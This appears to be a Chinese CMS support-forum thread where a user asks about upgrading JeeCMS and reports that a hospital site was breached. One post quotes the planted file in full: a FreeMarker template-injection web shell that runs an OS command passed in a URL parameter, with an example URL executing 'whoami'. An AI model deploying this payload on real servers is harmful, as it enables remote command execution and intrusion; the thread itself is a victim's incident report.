主题 : 我的jeecms 需要从1.6升级到1.13请问升级包在哪里 |
级别: 秀才
|
21# 发表于:2022-06-30 15:58:35 IP:112.33.*.*
|
||||
---|---|---|---|---|---|
级别: 秀才
|
25# 发表于:2022-06-30 16:27:17 IP:112.33.*.*
福建医科大学附属第二医院
https://www.fyey.cn/ 网站被入侵了 不知道通过什么方式上传了一个html,然后通过https://www.fyey.cn/..-..-..-..-..-u-cms-www-202205-25113517vh2g.htm?MemberVo=whoami 这样的url可以访问到这个页面, html里面的内容是 ${site.getClass().getProtectionDomain().getClassLoader().loadClass("freemarker.template.ObjectWrapper").getField("DEFAULT_WRAPPER").get(null).newInstance(site.getClass().getProtectionDomain().getClassLoader().loadClass("freemarker.template.utility.Execute"), null)(MemberVo)} |
||
---|---|---|---|
级别: 版主
|
26# 发表于:2022-06-30 16:32:24 IP:183.219.*.*
|
||
---|---|---|---|
级别: 秀才
|
29# 发表于:2022-06-30 17:04:32 IP:112.33.*.*
那升级的问题呢,之前的log4j,和spring boot都爆出安全漏洞,这个肯定要升级的
|
||
---|---|---|---|